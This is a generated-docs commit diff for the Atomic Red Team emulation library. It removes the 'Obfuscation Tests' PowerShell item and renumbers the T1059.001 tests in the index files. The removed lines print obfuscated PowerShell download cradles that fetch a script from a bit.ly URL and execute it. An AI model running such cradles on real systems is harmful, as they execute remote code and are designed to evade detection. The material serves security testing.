Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -917,24 +917,23 @@ execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-be
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,3,Run Bloodhound from Memory using Download Cradle,bf8c1441-4674-4dab-8e4e-39d93d08f9b7,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Obfuscation Tests,4297c41a-8168-4138-972d-01f3ee92c804,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
 execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
 execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -618,24 +618,23 @@ execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-be
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,3,Run Bloodhound from Memory using Download Cradle,bf8c1441-4674-4dab-8e4e-39d93d08f9b7,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Obfuscation Tests,4297c41a-8168-4138-972d-01f3ee92c804,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
 execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt
 execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt
 execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -1239,24 +1239,23 @@
   - Atomic Test #1: Mimikatz [windows]
   - Atomic Test #2: Run BloodHound from local disk [windows]
   - Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows]
-  - Atomic Test #4: Obfuscation Tests [windows]
-  - Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows]
-  - Atomic Test #6: Invoke-AppPathBypass [windows]
-  - Atomic Test #7: Powershell MsXml COM object - with prompt [windows]
-  - Atomic Test #8: Powershell XML requests [windows]
-  - Atomic Test #9: Powershell invoke mshta.exe download [windows]
-  - Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
-  - Atomic Test #11: PowerShell Fileless Script Execution [windows]
-  - Atomic Test #12: NTFS Alternate Data Stream Access [windows]
-  - Atomic Test #13: PowerShell Session Creation and Use [windows]
-  - Atomic Test #14: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
-  - Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
-  - Atomic Test #16: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
-  - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
-  - Atomic Test #18: PowerShell Command Execution [windows]
-  - Atomic Test #19: PowerShell Invoke Known Malicious Cmdlets [windows]
-  - Atomic Test #20: PowerUp Invoke-AllChecks [windows]
-  - Atomic Test #21: Abuse Nslookup with DNS Records [windows]
+  - Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
+  - Atomic Test #5: Invoke-AppPathBypass [windows]
+  - Atomic Test #6: Powershell MsXml COM object - with prompt [windows]
+  - Atomic Test #7: Powershell XML requests [windows]
+  - Atomic Test #8: Powershell invoke mshta.exe download [windows]
+  - Atomic Test #9: Powershell Invoke-DownloadCradle [windows]
+  - Atomic Test #10: PowerShell Fileless Script Execution [windows]
+  - Atomic Test #11: NTFS Alternate Data Stream Access [windows]
+  - Atomic Test #12: PowerShell Session Creation and Use [windows]
+  - Atomic Test #13: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
+  - Atomic Test #14: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
+  - Atomic Test #15: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
+  - Atomic Test #16: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
+  - Atomic Test #17: PowerShell Command Execution [windows]
+  - Atomic Test #18: PowerShell Invoke Known Malicious Cmdlets [windows]
+  - Atomic Test #19: PowerUp Invoke-AllChecks [windows]
+  - Atomic Test #20: Abuse Nslookup with DNS Records [windows]
 - [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
   - Atomic Test #1: Create Systemd Service and Timer [linux]
   - Atomic Test #2: Create a user level transient systemd service and timer [linux]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -857,24 +857,23 @@
   - Atomic Test #1: Mimikatz [windows]
   - Atomic Test #2: Run BloodHound from local disk [windows]
   - Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows]
-  - Atomic Test #4: Obfuscation Tests [windows]
-  - Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows]
-  - Atomic Test #6: Invoke-AppPathBypass [windows]
-  - Atomic Test #7: Powershell MsXml COM object - with prompt [windows]
-  - Atomic Test #8: Powershell XML requests [windows]
-  - Atomic Test #9: Powershell invoke mshta.exe download [windows]
-  - Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
-  - Atomic Test #11: PowerShell Fileless Script Execution [windows]
-  - Atomic Test #12: NTFS Alternate Data Stream Access [windows]
-  - Atomic Test #13: PowerShell Session Creation and Use [windows]
-  - Atomic Test #14: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
-  - Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
-  - Atomic Test #16: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
-  - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
-  - Atomic Test #18: PowerShell Command Execution [windows]
-  - Atomic Test #19: PowerShell Invoke Known Malicious Cmdlets [windows]
-  - Atomic Test #20: PowerUp Invoke-AllChecks [windows]
-  - Atomic Test #21: Abuse Nslookup with DNS Records [windows]
+  - Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
+  - Atomic Test #5: Invoke-AppPathBypass [windows]
+  - Atomic Test #6: Powershell MsXml COM object - with prompt [windows]
+  - Atomic Test #7: Powershell XML requests [windows]
+  - Atomic Test #8: Powershell invoke mshta.exe download [windows]
+  - Atomic Test #9: Powershell Invoke-DownloadCradle [windows]
+  - Atomic Test #10: PowerShell Fileless Script Execution [windows]
+  - Atomic Test #11: NTFS Alternate Data Stream Access [windows]
+  - Atomic Test #12: PowerShell Session Creation and Use [windows]
+  - Atomic Test #13: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
+  - Atomic Test #14: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
+  - Atomic Test #15: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
+  - Atomic Test #16: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
+  - Atomic Test #17: PowerShell Command Execution [windows]
+  - Atomic Test #18: PowerShell Invoke Known Malicious Cmdlets [windows]
+  - Atomic Test #19: PowerUp Invoke-AllChecks [windows]
+  - Atomic Test #20: Abuse Nslookup with DNS Records [windows]
 - [T1559 Inter-Process Communication](../../T1559/T1559.md)
   - Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
   - Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows]

atomics/Indexes/index.yaml

@@ -50754,21 +50754,6 @@ execution:
 
           '
         name: powershell
-    - name: Obfuscation Tests
-      auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804
-      description: 'Different obfuscated methods to test. Upon execution, reaches
-        out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM
-        REMOTE LOCATION"
-
-        '
-      supported_platforms:
-      - windows
-      executor:
-        command: |
-          (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
-          (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
-          Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
-        name: powershell
     - name: Mimikatz - Cradlecraft PsSendKeys
       auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d
       description: 'Run mimikatz via PsSendKeys. Upon execution, automated actions

atomics/Indexes/windows-index.yaml

@@ -41909,21 +41909,6 @@ execution:
 
           '
         name: powershell
-    - name: Obfuscation Tests
-      auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804
-      description: 'Different obfuscated methods to test. Upon execution, reaches
-        out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM
-        REMOTE LOCATION"
-
-        '
-      supported_platforms:
-      - windows
-      executor:
-        command: |
-          (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
-          (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
-          Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
-        name: powershell
     - name: Mimikatz - Cradlecraft PsSendKeys
       auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d
       description: 'Run mimikatz via PsSendKeys. Upon execution, automated actions

atomics/T1059.001/T1059.001.md

@@ -16,41 +16,39 @@ PowerShell commands/scripts can also be executed without directly invoking the <
 
 - [Atomic Test #3 - Run Bloodhound from Memory using Download Cradle](#atomic-test-3---run-bloodhound-from-memory-using-download-cradle)
 
-- [Atomic Test #4 - Obfuscation Tests](#atomic-test-4---obfuscation-tests)
+- [Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys](#atomic-test-4---mimikatz---cradlecraft-pssendkeys)
 
-- [Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys](#atomic-test-5---mimikatz---cradlecraft-pssendkeys)
+- [Atomic Test #5 - Invoke-AppPathBypass](#atomic-test-5---invoke-apppathbypass)
 
-- [Atomic Test #6 - Invoke-AppPathBypass](#atomic-test-6---invoke-apppathbypass)
+- [Atomic Test #6 - Powershell MsXml COM object - with prompt](#atomic-test-6---powershell-msxml-com-object---with-prompt)
 
-- [Atomic Test #7 - Powershell MsXml COM object - with prompt](#atomic-test-7---powershell-msxml-com-object---with-prompt)
+- [Atomic Test #7 - Powershell XML requests](#atomic-test-7---powershell-xml-requests)
 
-- [Atomic Test #8 - Powershell XML requests](#atomic-test-8---powershell-xml-requests)
+- [Atomic Test #8 - Powershell invoke mshta.exe download](#atomic-test-8---powershell-invoke-mshtaexe-download)
 
-- [Atomic Test #9 - Powershell invoke mshta.exe download](#atomic-test-9---powershell-invoke-mshtaexe-download)
+- [Atomic Test #9 - Powershell Invoke-DownloadCradle](#atomic-test-9---powershell-invoke-downloadcradle)
 
-- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle)
+- [Atomic Test #10 - PowerShell Fileless Script Execution](#atomic-test-10---powershell-fileless-script-execution)
 
-- [Atomic Test #11 - PowerShell Fileless Script Execution](#atomic-test-11---powershell-fileless-script-execution)
+- [Atomic Test #11 - NTFS Alternate Data Stream Access](#atomic-test-11---ntfs-alternate-data-stream-access)
 
-- [Atomic Test #12 - NTFS Alternate Data Stream Access](#atomic-test-12---ntfs-alternate-data-stream-access)
+- [Atomic Test #12 - PowerShell Session Creation and Use](#atomic-test-12---powershell-session-creation-and-use)
 
-- [Atomic Test #13 - PowerShell Session Creation and Use](#atomic-test-13---powershell-session-creation-and-use)
+- [Atomic Test #13 - ATHPowerShellCommandLineParameter -Command parameter variations](#atomic-test-13---athpowershellcommandlineparameter--command-parameter-variations)
 
-- [Atomic Test #14 - ATHPowerShellCommandLineParameter -Command parameter variations](#atomic-test-14---athpowershellcommandlineparameter--command-parameter-variations)
+- [Atomic Test #14 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments](#atomic-test-14---athpowershellcommandlineparameter--command-parameter-variations-with-encoded-arguments)
 
-- [Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments](#atomic-test-15---athpowershellcommandlineparameter--command-parameter-variations-with-encoded-arguments)
+- [Atomic Test #15 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations](#atomic-test-15---athpowershellcommandlineparameter--encodedcommand-parameter-variations)
 
-- [Atomic Test #16 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations](#atomic-test-16---athpowershellcommandlineparameter--encodedcommand-parameter-variations)
+- [Atomic Test #16 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments](#atomic-test-16---athpowershellcommandlineparameter--encodedcommand-parameter-variations-with-encoded-arguments)
 
-- [Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments](#atomic-test-17---athpowershellcommandlineparameter--encodedcommand-parameter-variations-with-encoded-arguments)
+- [Atomic Test #17 - PowerShell Command Execution](#atomic-test-17---powershell-command-execution)
 
-- [Atomic Test #18 - PowerShell Command Execution](#atomic-test-18---powershell-command-execution)
+- [Atomic Test #18 - PowerShell Invoke Known Malicious Cmdlets](#atomic-test-18---powershell-invoke-known-malicious-cmdlets)
 
-- [Atomic Test #19 - PowerShell Invoke Known Malicious Cmdlets](#atomic-test-19---powershell-invoke-known-malicious-cmdlets)
+- [Atomic Test #19 - PowerUp Invoke-AllChecks](#atomic-test-19---powerup-invoke-allchecks)
 
-- [Atomic Test #20 - PowerUp Invoke-AllChecks](#atomic-test-20---powerup-invoke-allchecks)
-
-- [Atomic Test #21 - Abuse Nslookup with DNS Records](#atomic-test-21---abuse-nslookup-with-dns-records)
+- [Atomic Test #20 - Abuse Nslookup with DNS Records](#atomic-test-20---abuse-nslookup-with-dns-records)
 
 
 <br/>
@@ -175,37 +173,7 @@ Remove-Item $env:Temp\*BloodHound.zip -Force
 <br/>
 <br/>
 
-## Atomic Test #4 - Obfuscation Tests
-Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** 4297c41a-8168-4138-972d-01f3ee92c804
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
-(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
-Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys
